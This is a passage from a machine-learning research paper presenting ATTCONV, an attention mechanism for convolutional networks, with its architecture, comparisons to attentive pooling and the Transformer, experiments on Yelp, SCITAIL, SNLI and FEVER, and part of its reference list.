beneficiary of attention is again the hidden states of tx; that is, it is identical to the source of attention. We now try to distinguish these three con- cepts further to promote the expressivity of an at- tentive convolutional layer. We call it “advanced ATTCONV”; see Figure 4(b). It differs from the light version in three ways: (i) attention source is learned by function fmgran(Hx), feature map Hx of tx acting as input; (ii) attention focus is learned by function fmgran(Hy), feature map Hy of con- text ty acting as input; and (iii) attention benefi- ciary is learned by function fbene(Hx), Hx acting as input. Both functions fmgran() and fbene() are based on a gated convolutional function fgconv(): oi = tanh(Wh · ii + bh) (7) gi = sigmoid(Wg · ii + bg) (8) fgconv(ii) = gi ·ui + (1−gi) ·oi (9) where ii is a composed representation, denoting a generally defined input phrase [· · · , ui, · · · ] of arbitrary length with ui as the central unigram- level hidden state, and the gate gi sets a trade-off between the unigram-level input ui and the tem- porary output oi at the phrase-level. We elaborate these modules in the remainder of this subsection. Attention Source. First, we present a general instance of generating source of attention by func- tion fmgran(H), learning word representations in multi-granular context. In our system, we con- sider granularities 1 and 3, corresponding to unigram hidden state and trigram hidden state. For the uni-hidden state case, it is a gated convolution layer: hxuni,i = fgconv(h x i ) (10) 691 For the tri-hidden state case: hxtri,i = fgconv([h x i−1, h x i , h x i+1]) (11) Finally, the overall hidden state at position i is the concatenation of huni,i and htri,i: hxmgran,i = [h x uni,i, h x tri,i] (12) that is, fmgran(Hx) = Hxmgran. Such a kind of comprehensive hidden state can encode the semantics of multigranular spans at a position, such as “out” and “come out of.” Gating here implicitly enables cross-granular alignments in subsequent attention mechanism as it sets highway connections (Srivastava et al., 2015) between the input granularity and the output granularity. Attention Focus. For simplicity, we use the same architecture for the attention source (just in- troduced) and for the attention focus, ty (i.e., for the attention focus: fmgran(Hy) = H y mgran; see Figure 4(b)). Thus, the focus of attention will participate in the matching process as well as be reweighted to form an attentive context vector. We leave exploring different architectures for atten- tion source and focus for future work. Another benefit of multi-granular hidden states in attention focus is to keep structure information in the context vector. In standard attention mechanisms in RNNs, all hidden states are average-weighted as a context vector, and the order information is missing. By introducing hidden states of larger granularity into CNNs that keep the local order or structures, we boost the attentive effect. Attention Beneficiary. In our system, we sim- ply use fgconv() over uni-granularity to learn a more abstract representation over the current hid- den representations in Hx, so that fbene(h x i ) = fgconv(h x i ) (13) Subsequently, the attentive context vector cxi is generated based on attention source feature map fmgran(Hx) and attention focus feature map fmgran(H y), according to the description of the light ATTCONV. Then attentive convolution is conducted over attention beneficiary feature map fbene(H x) and the attentive context vectors Cx to get a higher-layer feature map for the sentence tx. 3.3 Analysis Compared with the standard attention mechanism in RNNs, ATTCONV has a similar matching func- tion and a similar process of computing context vectors, but differs in three ways. (i) The dis- crimination of attention source, focus, and ben- eficiary improves expressivity. (ii) In CNNs, the surrounding hidden states for a concrete position are available, so the attention matching is able to encode the left context as well as the right con- text. In RNNs, however, we need bidirectional RNNs to yield both left and right context representations. (iii) As attentive convolution can be implemented by summing up two separate convolution steps (Equations 5 and 6), this ar- chitecture provides both attentive representations and representations computed without the use of attention. This strategy is helpful in practice to use richer representations for some NLP prob- lems. In contrast, such a clean modular separa- tion of representations computed with and without attention is harder to realize in attention-based RNNs. Prior attention mechanisms explored in CNNs mostly involve attentive pooling (dos Santos et al., 2016; Yin et al., 2016); namely, the weights of the post-convolution pooling layer are determined by attention. These weights come from the matching process between hidden states of two text pieces. However, a weight value is not informative enough to tell the relationships between aligned terms. Con- sider a textual entailment sentence pair for which we need to determine whether “inside −→ outside” holds. The matching degree (take cosine similar- ity as example) of these two words is high: for ex- ample, ≈ 0.7 in Word2Vec (Mikolov et al., 2013) and GloVe (Pennington et al., 2014). On the other hand, the matching score between “inside” and “in” is lower: 0.31 in Word2Vec, 0.46 in GloVe. Apparently, the higher number 0.7 does not mean that “outside” is more likely than “in” to be en- tailed by “inside.” Instead, joint representations for aligned phrases [hinside, houtside], [hinside, hin] are more informative and enable finer-grained rea- soning than a mechanism that can only transmit information downstream by matching scores. We modify the conventional CNN filters so that “in- side” can make the entailment decision by looking at the representation of the counterpart term (“out- side” or “in”) rather than a matching score. A more damaging property of attentive pooling is the following. Even if matching scores could convey the phrase-level entailment degree to some extent, matching weights, in fact, are not lever- aged to make the entailment decision directly; 692 instead, they are used to weight the sum of the output hidden states of a convolution as the global sentence representation. In other words, fine-grained entailment degrees are likely to be lost in the summation of many vectors. This illustrates why attentive context vectors partici- pating in the convolution operation are expected to be more effective than post-convolution atten- tive pooling (more explanations in §4.3, paragraph “Visualization”). Intra-context attention and extra-context at- tention. Figures 4(a) and 4(b) depict the model- ing of a sentence tx with its context ty. This is a common application of attention mechanism in the literature; we call it extra-context attention. But ATTCONV can also be applied to model a single text input, that is, intra-context attention. Consider a sentiment analysis example: “With the 2017 NBA All-Star game in the books I think we can all agree that this was definitely one to re- member. Not because of the three-point shootout, the dunk contest, or the game itself but because of the ludicrous trade that occurred after the festivi- ties.” This example contains informative points at different locations (“remember” and “ludicrous”); conventional CNNs’ ability to model nonlocal de- pendency is limited because of fixed-size filter widths. In ATTCONV, we can set ty = tx. The attentive context vector then accumulates all re- lated parts together for a given position. In other words, our intra-context attentive convolution is able to connect all related spans together to form a comprehensive decision. This is a new way to broaden the scope of conventional filter widths: A filter now covers not only the local window, but also those spans that are related, but are beyond the scope of the window. Comparison to Transformer.2 The “focus” in ATTCONV corresponds to “key” and “value” in Transformer; that is, our versions of “key” and “value” are the same, coming from the con- text sentence. The “query” in Transformer cor- responds to the “source” and “beneficiary” of ATTCONV; namely, our model has two perspec- tives to utilize the context: one acts as a real query (i.e., “source”) to attend the context, the other (i.e., “beneficiary”) takes the attentive con- 2Our “source-focus-beneficiary” mechanism was inspired by Adel and Schütze (2017). Vaswani et al. (2017) later pub- lished the Transformer model, which has a similar “query- key-value” mechanism. text back to improve the learned representation of itself. If we reduce ATTCONV to unigram convo- lutional filters, it is pretty much a single Trans- former layer (if we neglect the positional encoding in Transformer and unify the “query-key-value” and “source-focus-beneficiary” mechanisms). 4 Experiments We evaluate ATTCONV on sentence modeling in three scenarios: (i) Zero-context, that is, intra- context; the same input sentence acts as tx as well as ty; (ii) Single-context, that is, textual entailment—hypothesis modeling with a single premise as the extra-context; and (iii) Multiple- context, namely, claim verification—claim mod- eling with multiple extra-contexts. 4.1 Common Set-up and Common Baselines All experiments share a common set-up. The input is represented using 300-dimensional publicly available Word2Vec (Mikolov et al., 2013) em- beddings; out of vocabulary embeddings are ran- domly initialized. The architecture consists of the following four layers in sequence: embedding, attentive convolution, max-pooling, and logistic regression. The context-aware representation of tx is forwarded to the logistic regression layer. We use AdaGrad (Duchi et al., 2011) for training. Embeddings are fine-tuned during training. Hyper- parameter values include: learning rate 0.01, hidden size 300, batch size 50, filter width 3. All experiments are designed to explore com- parisons in three aspects: (i) within ATTCONV, “light” vs. “advanced”; (ii) “attentive convolution” vs. “attentive pooling”/“attention only”; and (iii) “attentive convolution” vs. “attentive RNN”. To this end, we always report “light” and “advanced” ATTCONV performance and compare against five types of common baselines: (i) w/o context; (ii) w/o attention; (iii) w/o convolution: Similar to the Transformer’s principle (Vaswani et al., 2017), we discard the convolution oper- ation in Equation (5) and forward the addition of the attentive context cxi and the h x i into a fully connected layer. To keep enough parame- ters, we stack in total four layers so that “w/o convolution” has the same size of parameters as light-ATTCONV; (iv) with attention: RNNs with attention and CNNs with attentive pooling; and (v) prior state of the art, typeset in italics. 693 systems acc w /o at te nt io n Paragraph Vector 58.43 Lin et al. Bi-LSTM 61.99 Lin et al. CNN 62.05 MultichannelCNN (Kim) 64.62 w it h at te nt io n CNN+internal attention 61.43 ABCNN 61.36 APCNN 61.98 Attentive-LSTM 63.11 Lin et al. RNN Self-Att. 64.21 A T T C O N V light 66.75 w/o convolution 61.34 advanced 67.36∗ Table 3: System comparison of sentiment analysis on Yelp. Significant improvements over state of the art are marked with ∗ (test of equal proportions, p < 0.05). 4.2 Sentence Modeling with Zero-context: Sentiment Analysis We evaluate sentiment analysis on a Yelp bench- mark released by Lin et al. (2017): review-star pairs in sizes 500K (train), 2,000 (dev), and 2,000 (test). Most text instances in this data set are long: 25%, 50%, 75% percentiles are 46, 81, and 125 words, respectively. The task is five-way classification: 1 to 5 stars. The measure is accuracy. We use this benchmark because the predominance of long texts lets us evaluate the system perfor- mance of encoding long-range context, and the system by Lin et al. is directly related to ATTCONV in intra-context scenario. Baselines. (i) w/o attention. Three baselines from Lin et al. (2017): Paragraph Vector (Le and Mikolov, 2014) (unsupervised sentence rep- resentation learning), BiLSTM, and CNN. We also reimplement MultichannelCNN (Kim, 2014), recognized as a simple but surprisingly strong sentence modeler. (ii) with attention. A vanilla “Attentive-LSTM” by Rocktäschel et al. (2016). “RNN Self-Attention” (Lin et al., 2017) is di- rectly comparable to ATTCONV: it also uses intra- context attention. “CNN+internal attention” (Adel and Schütze, 2017), an intra-context attention idea similar to, but less complicated than, Lin et al. (2017). ABCNN & APCNN – CNNs with atten- tive pooling. Results and Analysis. Table 3 shows that advanced-ATTCONV surpasses its “light” coun- terpart, and obtains significant improvement over the state of the art. 1 2 3 4 5 6 7 8 9 10 indices of sorted text groups 0.58 0.60 0.62 0.64 0.66 0.68 0.70 a c c MultichannelCNN ATTCONV 0.6+diff of two curves Figure 5: ATTCONV vs. MultichannelCNN for groups of Yelp text with ascending text lengths. ATTCONV performs more robustly across different lengths of text. In addition, ATTCONV surpasses attentive pool- ing (ABCNN&APCNN) with a big margin (>5%) and outperforms the representative attentive-LSTM (>4%). Furthermore, it outperforms the two self- attentive models: CNN+internal attention (Adel and Schütze, 2017) and RNN Self-Attention (Lin et al., 2017), which are specifically designed for single-sentence modeling. Adel and Schütze (2017) generate an attention weight for each CNN hidden state by a linear transformation of the same hidden state, then compute weighted average over all hidden states as the text representation. Lin et al. (2017) extend that idea by generating a group of attention weight vectors, then RNN hid- den states are averaged by those diverse weighted vectors, allowing extracting different aspects of the text into multiple vector representations. Both works are essentially weighted mean pooling, sim- ilar to the attentive pooling in Yin et al. (2016) and dos Santos et al. (2016). Next, we compare ATTCONV with Multichan- nelCNN, the strongest baseline system (“w/o attention”), for different length ranges to check whether ATTCONV can really encode long-range context effectively. We sort the 2,000 test instances by length, then split them into 10 groups, each consisting of 200 instances. Figure 5 shows per- formance of ATTCONV vs. MultichannnelCNN. We observe that ATTCONV consistently outper- forms MultichannelCNN for all lengths. Further- more, the improvement over MultichannelCNN generally increases with length. This is evidence that ATTCONV more effectively models long text. 694 #instances #entail #neutral train 23,596 8,602 14,994 dev 1,304 657 647 test 2,126 842 1,284 total 27,026 10,101 16,925 Table 4: Statistics of SCITAIL data set. systems acc w /o at te nt io n Majority Class 60.4 w/o Context 65.1 Bi-LSTM 69.5 NGram model 70.6 Bi-CNN 74.4 w it h at te nt io n Enhanced LSTM 70.6 Attentive-LSTM 71.5 Decomp-Att 72.3 DGEM 77.3 APCNN 75.2 ABCNN 75.8 ATTCONV-light 78.1 w/o convolution 75.1 ATTCONV-advanced 79.2 Table 5: ATTCONV vs. baselines on SCITAIL. This is likely because of ATTCONV’s capability to encode broader context in its filters. 4.3 Sentence Modeling with a Single Context: Textual Entailment Data Set. SCITAIL (Khot et al., 2018) is a textual entailment benchmark designed specifically for a real-world task: multi-choice question answering. All hypotheses tx were obtained by rephrasing (question, correct answer) pairs into single sen- tences, and premises ty are relevant Web sentences retrieved by an information retrieval method. Then the task is to determine whether a hypothesis is true or not, given a premise as context. All (tx, ty) pairs are annotated via crowdsourcing. Accuracy is reported. Table 1 shows examples and Table 4 gives statistics. By this construction, a substantial performance improvement on SCITAIL is equivalent to a better QA performance (Khot et al., 2018). The hypoth- esis tx is the target sentence, and the premise ty acts as its context. Baselines. Apart from the common baselines (see Section 4.1), we include systems covered by Khot et al. (2018): (i) n-gram Overlap: An overlap baseline, considering lexical granularity such as unigrams, one-skip bigrams, and one- skip trigrams. (ii) Decomposable Attention Model (Decomp-Att) (Parikh et al., 2016): Explore atten- tion mechanisms to decompose the task into sub- tasks to solve in parallel. (iii) Enhanced LSTM (Chen et al., 2017b): Enhance LSTM by taking into account syntax and semantics from parsing information. (iv) DGEM (Khot et al., 2018): A decomposed graph entailment model, the current state-of-the-art. Table 5 presents results on SCITAIL. (i) Within ATTCONV, “advanced” beats “light” by 1.1%; (ii) “w/o convolution” and attentive pooling (i.e., ABCNN & APCNN) get lower performances by 3%–4%; (iii) More complicated attention mech- anisms equipped into LSTM (e.g., “attentive- LSTM” and “enhanced-LSTM”) perform even worse. Error Analysis. To better understand the ATTCONV in SCITAIL, we study some error cases listed in Table 6. Language conventions. Pair #1 uses sequen- tial commas (i.e., in “the egg, larva, pupa, and adult”) or a special symbol sequence (i.e., in “egg −> larva −> pupa −> adult”) to form a set or sequence; pair #2 has “A (or B)” to express the equivalence of A and B. This challenge is expected to be handled by DNNs with specific training signals. Knowledge beyond the text ty. In #3, “be- cause smaller amounts of water evaporate in the cool morning” cannot be inferred from the premise ty directly. The main challenge in #4 is to dis- tinguish “weight” from “force,” which requires background physical knowledge that is beyond the presented text here and beyond the expressivity of word embeddings. Complex discourse relation. The premise in #5 has an “or” structure. In #6, the inserted phrase “with about 16,000 species” makes the connection between “nonvascular plants” and “the mosses, liverworts, and hornworts” hard to detect. Both instances require the model to decode the dis- course relation. ATTCONV on SNLI. Table 7 shows the com- parison. We observe that: (i) classifying hypothe- ses without looking at premises, that is, “w/o context” baseline, results in a large improvement over the “majority baseline.” This verifies the strong bias in the hypothesis construction of the SNLI data set (Gururangan et al., 2018; Poliak et al., 2018). (ii) ATTCONV (advanced) surpasses 695 # (Premise ty, Hypothesis tx) Pair G/P Challenge 1 (ty) These insects have 4 life stages, the egg, larva, pupa, and adult. 1/0 language conventions (tx) The sequence egg −> larva −> pupa −> adult shows the life cycle of some insects. 2 (ty) . . . the notochord forms the backbone (or vertebral column). 1/0 language conventions(tx) Backbone is another name for the vertebral column. 3 (ty) Water lawns early in the morning . . . prevent evaporation. 1/0 beyond text(tx) Watering plants and grass in the early morning is a way to conserve water because smaller amounts of water evaporate in the cool morning. 4 (ty) . . . the SI unit . . . for force is the Newton (N) and is defined as (kg·m/s−2 ). 0/1 beyond text (tx) Newton (N) is the SI unit for weight. 5 (ty) Heterotrophs get energy and carbon from living plants or animals (consumers) or from dead organic matter (decomposers). 0/1 discourse relation (tx) Mushrooms get their energy from decomposing dead organisms. 6 (ty) . . . are a diverse assemblage of three phyla of nonvascular plants, with 1/0 discourse relation about 16,000 species, that includes the mosses, liverworts, and hornworts. (tx) Moss is best classified as a nonvascular plant. Table 6: Error cases of ATTCONV in SCITAIL. “. . . ”: truncated text. “G/P”: gold/predicted label. Systems #para acc w /o at te nt io n majority class 0 34.3 w/o context (i.e., hypothesis only) 270K 68.7 Bi-LSTM (Bowman et al., 2015) 220K 77.6 Bi-CNN 270K 80.3 Tree-CNN (Mou et al., 2016) 3.5M 82.1 NES (Munkhdalai and Yu, 2017) 6.3M 84.8 w it h at te nt io n Attentive-LSTM (Rocktäschel) 250K 83.5 Self-Attentive (Lin et al., 2017) 95M 84.4 Match-LSTM (Wang and Jiang) 1.9M 86.1 LSTMN (Cheng et al., 2016) 3.4M 86.3 Decomp-Att (Parikh) 580K 86.8 Enhanced LSTM (Chen et al., 2017b) 7.7M 88.6 ABCNN (Yin et al., 2016) 834K 83.7 APCNN (dos Santos et al., 2016) 360K 83.9 ATTCONV – light 360K 86.3 w/o convolution 360K 84.9 ATTCONV – advanced 900K 87.8 State-of-the-art (Peters et al., 2018) 8M 88.7 Table 7: Performance comparison on SNLI test. En- semble systems are not included. all “w/o attention” baselines and “with attention” CNN baselines (i.e., attentive pooling), obtaining a performance (87.8%) that is close to the state of the art (88.7%). We also report the parameter size in SNLI as most baseline systems did. Table 7 shows that, in comparison to these baselines, our ATTCONV (light and advanced) has a more lim- ited number of parameters, yet its performance is competitive. Visualization. In Figure 6, we visualize the attention mechanisms explored in attentive con- volution (Figure 6(a)) and attentive pooling (Figure 6(b)). Figure 6(a) explores the visualization of two kinds of features learned by light ATTCONV in SNLI data set (most are short sentences with rich phrase-level reasoning): (i) ei,j in Equa- tion (1) (after softmax), which shows the attention distribution over context ty by the hidden state hxi in sentence t x; (ii) hxi,new in Equation (5) for i = 1, 2, · · · , |tx|; it shows the context- aware word features in tx. By the two visual- ized features, we can identify which parts of the context ty are more important for a word in sen- tence tx, and a max-pooling, over those context- driven word representations, selects and forwards dominant (word, leftcontext, rightcontext, attcontext) combinations to the final decision maker. Figure 6(a) shows the features3 of sentence tx = “A dog jumping for a Frisbee in the snow” con- ditioned on the context ty = “An animal is out- side in the cold weather, playing with a plastic toy.” Observations: (i) The right figure shows that the attention mechanism successfully aligns some cross-sentence phrases that are informative to the textual entailment problem, such as “dog” to “animal” (i.e., cxdog ≈ “animal”), “Frisbee” to “plastic toy” and “playing” (i.e., cxFrisbee ≈ “plastic toy”+“playing”); (ii) The left figure shows a max-pooling over the generated features of filter_1 and filter_2 will focus on the context- aware phrases (A, dog, jumping, cxdog) and (a, 3For simplicity, we show 2 out of 300 ATTCONV filters. 696 A dog for a in the .snow ju m pi ng Fr is be e c x dog c x Fris. An in cold ,is the with toy .a an im al ou ts id e w ea th er pl ay in g pl as tic t x t y (a) Visualization for features generated by ATTCONV’s filters on sentence tx and ty. A max-pooling, over filter_1, locates the phrase (A, dog, jumping, cxdog), and locates the phrase (a, Frisbee, in, c x F risbee) via filter_2. “c x dog” (resp. c x F ris.)—the attentive context of “dog” (resp. “Frisbee”) in tx—mainly comes from “animal” (resp. “toy” and “playing”) in ty. A dog for a in the .snow ju m pi ng Fr is be e An in cold ,is the with toy .a an im al ou ts id e w ea th er pl ay in g pl as tic t x t y convolution output (filter width=3) (b) Attention visualization for attentive pooling (ABCNN). Based on the words in tx and ty, first, a convolution layer with filter width 3 outputs hidden states for each sentence, then each hidden state will obtain an attention weight for how well this hidden state matches towards all the hidden states in the other sentence, and finally all hidden states in each sentence will be weighted and summed up as the sentence representation. This visualization shows that the spans “dog jumping for” and “in the snow” in tx and the spans “animal is outside” and “in the cold” in ty are most indicative to the entailment reasoning. Figure 6: Attention visualization for attentive convolution (top) and attentive pooling (bottom) between sentence tx = “A dog jumping for a Frisbee in the snow” (left) and sentence ty = “An animal is outside in the cold weather, playing with a plastic toy” (right). Frisbee, in, cxFrisbee) respectively; the two phrases are crucial to the entailment reasoning for this (ty, tx) pair. Figure 6(b) shows the phrase-level (i.e., each consecutive trigram) attentions after the convolu- tion operation. As Figure 3 shows, a subsequent pooling step will weight and sum up those phrase- level hidden states as an overall sentence represen- tation. So, even though some phrases such as “in the snow” in tx and “in the cold” in ty show im- portance in this pair instance, the final sentence representation still (i) lacks a fine-grained phrase- to-phrase reasoning, and (ii) underestimates some indicative phrases such as “A dog” in tx and “An animal” in ty. Briefly, attentive convolution first performs phrase-to-phrase, inter-sentence reasoning, then composes features; attentive pooling composes 697 #SUPPORTED #REFUTED #NEI train 80,035 29,775 35,639 dev 3,333 3,333 3,333 test 3,333 3,333 3,333 Table 8: Statistics of claims in the FEVER data set. phrase features as sentence representations, then performs reasoning. Intuitively, attentive convo- lution better fits the way humans conduct entail- ment reasoning, and our experiments validate its superiority—it is the hidden states of the aligned phrases rather than their matching scores that support better representation learning and decision-making. The comparisons in both SCITAIL and SNLI show that: • CNNs with attentive convolution (i.e., ATTCONV) outperform the CNNs with at- tentive pooling (i.e., ABCNN and APCNN); • Some competitors got over-tuned on SNLI while demonstrating mediocre performance in SCITAIL—a real-world NLP task. Our sys- tem ATTCONV shows its robustness in both benchmark data sets. 4.4 Sentence Modeling with Multiple Contexts: Claim Verification Data Set. For this task, we use FEVER (Thorne et al., 2018); it infers the truthfulness of claims by extracted evidence. The claims in FEVER were manually constructed from the introductory sec- tions of about 50K popular Wikipedia articles in the June 2017 dump. Claims have 9.4 tokens on average. Table 8 lists the claim statistics. In addition to claims, FEVER also provides a Wikipedia corpus of approximately 5.4 million ar- ticles, from which gold evidences are gathered and provided. Figure 7 shows the distributions of sen- tence sizes in FEVER’s ground truth evidence set (i.e., the context size in our experimental set-up). We can see that roughly 28% of evidence instances cover more than one sentence and roughly 16% cover more than two sentences. Each claim is labeled as SUPPORTED, RE- FUTED, or NOTENOUGHINFO (NEI) given the gold evidence. The standard FEVER task also explores the performance of evidence extraction, evaluated by F1 between extracted evidence and gold evidence. This work focuses on the claim en- tailment part, assuming the evidences are provided (extracted or gold). More specifically, we treat a claim as tx, and its evidence sentences as context ty. 1 2 3 4 5 6 7 8 9 10 >10 #context for each claim sentence 0 5 10 15 ... % 12.13 4.07 2.85 2.90 1.76 0.98 0.68 0.49 0.40 1.85 71.88 Figure 7: Distribution of #sentence in FEVER evi- dence. This task has two evaluations: (i) ALL— accuracy of claim verification regardless of the validness of evidence; (ii) SUBSET—verification accuracy of a subset of claims, in which the gold evidence for SUPPORTED and REFUTED claims must be fully retrieved. We use the official eval- uation toolkit.4 Set-ups. (i) We adopt the same retrieved evi- dence set (i.e, contexts ty) as Thorne et al. (2018): top-5 most relevant sentences from top-5 retrieved wiki pages by a document retriever (Chen et al., 2017a). The quality of this evidence set against the ground truth is: 44.22 (recall), 10.44 (precision), 16.89 (F1) on dev, and 45.89 (recall), 10.79 (pre- cision), 17.47 (F1) on test. This set-up challenges our system with potentially unrelated or even mis- leading context. (ii) We use the ground truth evi- dence as context. This lets us determine how far our ATTCONV can go for this claim verification problem once the accurate evidence is given. Baselines. We first include the two systems ex- plored by Thorne et al. (2018): (i) MLP: A multi- layer perceptron baseline with a single hidden layer, based on tf-idf cosine similarity between the claim and the evidence (Riedel et al., 2017); (ii) Decomp-Att (Parikh et al., 2016): A decompos- able attention model that is tested in SCITAIL and SNLI before. Note that both baselines first relied on an information retrieval system to extract the top-5 relevant sentences from the retrieved top-5 wiki pages as evidence for claims, then concate- nated all evidence sentences as a longer context for a claim. 4https://github.com/sheffieldnlp/fever- scorer. 698 https://github.com/sheffieldnlp/fever-scorer https://github.com/sheffieldnlp/fever-scorer retrie. evi. gold system ALL SUB evi. de v MLP 41.86 19.04 65.13 Bi-CNN 47.82 26.99 75.02 APCNN 50.75 30.24 78.91 ABCNN 51.39 32.44 77.13 Attentive-LSTM 52.47 33.19 78.44 Decomp-Att 52.09 32.57 80.82 ATTCONV light,context-wise 57.78 34.29 83.20 w/o conv. 47.29 25.94 73.18 light,context-conc 59.31 37.75 84.74 w/o conv. 48.02 26.67 73.44 advan.,context-wise 60.20 37.94 84.99 advan.,context-conc 62.26 39.44 86.02 te st (Thorne et al., 2018) 50.91 31.87 – ATTCONV 61.03 38.77 84.61 Table 9: Performance on dev and test of FEVER. In “gold evi.” scenario, ALL SUBSET are the same. We then consider two variants of our ATTCONV in dealing with modeling of tx with variable-size context ty. (i) Context-wise: we first use all evidence sentences one by one as context ty to guide the representation learning of the claim tx, generating a group of context-aware representation vectors for the claim, then we do element-wise max-pooling over this vector group as the final representation of the claim. (ii) Context-conc: concatenate all evidence sentences as a single piece of context, then model the claim based on this context. This is the same preprocessing step as Thorne et al. (2018) did. Results. Table 9 compares our ATTCONV in dif- ferent set-ups against the baselines. First, ATTCONV surpasses the top competitor “Decomp-Att,” reported in Thorne et al. (2018), with big mar- gins in dev (ALL: 62.26 vs. 52.09) and test (ALL: 61.03 vs. 50.91). In addition, “advanced- ATTCONV” consistently outperforms its “light” counterpart. Moreover, ATTCONV surpasses at- tentive pooling (i.e., ABCNN & APCNN) and “attentive-LSTM” by >10% in ALL, >6% in SUB and >8% in “gold evi.” Figure 8 further explores the fine-grained per- formance of ATTCONV for different sizes of gold evidence (i.e., different sizes of context ty). The system shows comparable performances for sizes 1 and 2. Even for context sizes larger than 5, it only drops by 5%. 1 2 3 4 5 >5 gold #context for each claim 81.5 82.0 82.5 83.0 83.5 84.0 84.5 85.0 ac c (% ) Figure 8: Fine-grained ATTCONV performance given variable-size golden FEVER evidence as claim’s con- text. These experiments on claim verification clearly show the effectiveness of ATTCONV in sen- tence modeling with variable-size context. This should be attributed to the attention mechanism in ATTCONV, which enables a word or a phrase in the claim tx to “see” and accumulate all related clues even if those clues are scattered across mul- tiple contexts ty. Error Analysis. We do error analysis for “re- trieved evidence” scenario. Error case #1 is due to the failure of fully re- trieving all evidence. For example, a successful support of the claim “Weekly Idol has a host born in the year 1978” requires the information compo- sition from three evidence sentences, two from the wiki article “Weekly Idol,” and one from “Jeong Hyeong-don.” However, only one of them is retrieved in the top-5 candidates. Our system pre- dicts REFUTED. This error is more common in instances for which no evidence is retrieved. Error case #2 is due to the insufficiency of rep- resentation learning. Consider the wrong claim “Corsica belongs to Italy” (i.e., in REFUTED class). Even though good evidence is retrieved, the system is misled by noise evidence: “It is located . . . west of the Italian Peninsula, with the nearest land mass being the Italian island . . . ”. Error case #3 is due to the lack of advanced data preprocessing. For a human, it is very easy to “re- fute” the claim “Telemundo is an English-language television network” by the evidence “Telemundo is an American Spanish-language terrestrial tele- vision . . . ” (from the “Telemundo” wikipage), by checking the keyphrases: “Spanish-language” vs. “English-language.” Unfortunately, both tokens are unknown words in our system; as a result, 699 they do not have informative embeddings. A more careful data preprocessing is expected to help. 5 Summary We presented ATTCONV, the first work that en- ables CNNs to acquire the attention mechanism commonly used in RNNs. ATTCONV combines the strengths of CNNs with the strengths of the RNN attention mechanism. On the one hand, it makes broad and rich context available for prediction, either context from external inputs (extra-context) or internal inputs (intra-context). On the other hand, it can take full advantage of the strengths of convolution: It is more order- sensitive than attention in RNNs and local-context information can be powerfully and efficiently modeled through convolution filters. Our experi- ments demonstrate the effectiveness and flexibil- ity of ATTCONV when modeling sentences with variable-size context. Acknowledgments We gratefully acknowledge funding for this work by the European Research Council (ERC #740516). We would like to thank the anonymous reviewers for their helpful comments. References Heike Adel and Hinrich Schütze. 2017. Exploring different dimensions of attention for uncertainty detection. In Proceedings of EACL, pages 22–34, Valencia, Spain. Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Bengio. 2015. Neural machine translation by jointly learning to align and translate. In Pro- ceedings of ICLR, San Diego, USA. Samuel R. Bowman, Gabor Angeli, Christopher Potts, and Christopher D. Manning. 2015. A large annotated corpus for learning natural lan- guage inference. In Proceedings of EMNLP, pages 632–642, Lisbon, Portugal. Danqi Chen, Adam Fisch, Jason Weston, and Antoine Bordes. 2017a. Reading Wikipedia to answer open-domain questions. In Proceedings of ACL, pages 1870–1879, Vancouver, Canada. Qian Chen, Xiaodan Zhu, Zhen-Hua Ling, Si Wei, Hui Jiang, and Diana Inkpen. 2017b. Enhanced LSTM for natural language inference. In Pro- ceedings of ACL, pages 1657–1668, Vancouver, Canada. Jianpeng Cheng, Li Dong, and Mirella Lapata. 2016. Long short-term memory-networks for machine reading. In Proceedings of EMNLP, pages 551–561, Austin, USA. Ronan Collobert, Jason Weston, Léon Bottou, Michael Karlen, Koray Kavukcuoglu, and Pavel P. Kuksa. 2011. Natural language processing (almost) from scratch. Journal of Machine Learning Research, 12:2493–2537. Ido Dagan, Dan Roth, Mark Sammons, and Fabio Massimo Zanzotto. 2013. Recognizing Textual Entailment: Models and Applications. Synthesis Lectures on Human Language Tech- nologies. Morgan & Claypool. John Duchi, Elad Hazan, and Yoram Singer. 2011. Adaptive subgradient methods for online learn- ing and stochastic optimization. Journal of Ma- chine Learning Research, 12:2121–2159. Jeffrey L. Elman. 1990. Finding structure in time. Cognitive Science, 14(2):179–211. Jonas Gehring, Michael Auli, David Grangier, Denis Yarats, and Yann N. Dauphin. 2017. Convolutional sequence to sequence learning. In Proceedings of ICML, pages 1243–1252, Sydney, Australia. Alex Graves. 2013. Generating sequences with re- current neural networks. CoRR, abs/1308.0850. Alex Graves, Greg Wayne, and Ivo Danihelka. 2014. Neural turing machines. CoRR, abs/1410.5401. Suchin Gururangan, Swabha Swayamdipta, Omer Levy, Roy Schwartz, Samuel R. Bowman, and Noah A. Smith. 2018. Annotation artifacts in natural language inference data. In Proceedings of NAACL-HLT, pages 107–112, New Orleans, USA. Karl Moritz Hermann, Tomás Kociský, Edward Grefenstette, Lasse Espeholt, Will Kay, Mustafa Suleyman, and Phil Blunsom. 2015. Teach- ing machines to read and comprehend. In Pro- ceedings of NIPS, pages 1693–1701, Montreal, Canada. 700 Nal Kalchbrenner, Edward Grefenstette, and Phil Blunsom. 2014. A convolutional neural net- work for modelling sentences. In Proceedings of ACL, pages 655–665, Baltimore, USA. Tushar Khot, Ashish Sabharwal, and Peter Clark. 2018. SciTaiL: A textual entailment dataset from science question answering. In Proceed- ings of AAAI, pages 5189–5197, New Orleans, USA. Yoon Kim. 2014. Convolutional neural networks for sentence classification. In Proceedings of EMNLP, pages 1746–1751, Doha, Qatar. Yoon Kim, Carl Denton, Luong Hoang, and Alexander M. Rush. 2017. Structured atten- tion networks. In Proceedings of ICLR, Toulon, France. Ankit Kumar, Ozan Irsoy, Peter Ondruska, Mohit Iyyer, James Bradbury, Ishaan Gulrajani, Victor Zhong, Romain Paulus, and Richard Socher. 2016. Ask me anything: Dynamic memory networks for natural language process- ing. In Proceedings of ICML, pages 1378–1387, New York City, USA. Quoc Le and Tomas Mikolov. 2014. Distributed representations of sentences and documents. In Proceedings of ICML, pages 1188–1196, Beijing, China. Yann LeCun, Léon Bottou, Yoshua Bengio, and Patrick Haffner. 1998. Gradient-based learning applied to document recognition. Proceedings of the IEEE, 86(11):2278–2324. Jiwei Li, Minh-Thang Luong, and Dan Jurafsky. 2015. A hierarchical neural autoencoder for paragraphs and documents. In Proceedings of ACL, pages 1106–1115, Beijing, China. Jindrich Libovický and Jindrich Helcl. 2017. At- tention strategies for multi-source sequence- to-sequence learning. In Proceedings of ACL, pages 196–202, Vancouver, Canada. Zhouhan Lin, Minwei Feng, Cícero Nogueira dos Santos, Mo Yu, Bing Xiang, Bowen Zhou, and Yoshua Bengio. 2017. A structured self- attentive sentence 